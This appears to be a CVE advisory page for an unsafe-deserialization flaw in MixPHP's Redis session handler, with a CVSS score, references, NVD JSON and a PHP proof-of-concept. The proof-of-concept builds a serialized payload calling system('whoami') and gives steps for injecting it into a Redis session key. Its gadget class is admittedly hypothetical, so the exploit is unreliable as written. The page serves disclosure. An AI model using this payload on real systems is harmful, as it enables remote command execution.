CVE-2026-42472

Description

Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from Redis in the RedisHandler object.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

MixPHP Framework 2.x

MixPHP Framework <= 2.2.17

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<?php
/**
 * PoC Generator for CVE-2026-42472
 * MixPHP Framework <= 2.2.17 Unsafe Deserialization
 * 
 * This script generates a malicious serialized payload.
 * The payload targets the RedisHandler session/cache mechanism.
 */

namespace Mix\SyncInvoke;

// Hypothetical Gadget class based on referenced Server.php
// Attackers need to find a class in the framework with __destruct or __wakeup
// that performs dangerous actions (e.g., file operations, system calls).

class Server {
    public $function;
    public $arguments;

    public function __construct() {
        // Target function to execute (e.g., system, shell_exec)
        $this->function = 'system';
        // Command arguments
        $this->arguments = ['whoami'];
    }
}

// Generate the payload object
$payloadObject = new Server();

// Serialize the object
$maliciousPayload = serialize($payloadObject);

// Output the payload
echo "[+] Generated Malicious Payload:\n";
echo $maliciousPayload . "\n";

echo "\n[+] Usage Instructions:\n";
echo "1. Connect to the target Redis instance used by MixPHP.\n";
echo "2. Inject the payload into a session key or cache key.\n";
echo "   Example Redis Command: SET PHPREDIS_SESSION:<session_id> '" . $maliciousPayload . "'\n";
echo "3. Trigger the MixPHP application to load the session/cache.\n";
echo "4. If a valid gadget chain exists, the command 'whoami' will execute.\n";
?>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42472
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42472
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42472/
[4] VulDB https://vuldb.com/cve/CVE-2026-42472
[5] https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975
[6] https://github.com/mix-php/mix
[7] https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42472", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:31.587", "lastModified": "2026-05-05T19:39:58.510", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unsafe deserialization vulnerability in MixPHP Framework 2.x thru 2.2.17. The session and cache handlers use unserialize() on data from Redis in the RedisHandler object."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://gist.github.com/sgInnora/fa46386840fe978a30d7e53c458f2975", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix", "source": "[email protected]"}, {"url": "https://github.com/mix-php/mix/blob/v2.2.17/src/sync-invoke/src/Server.php", "source": "[email protected]"}]}}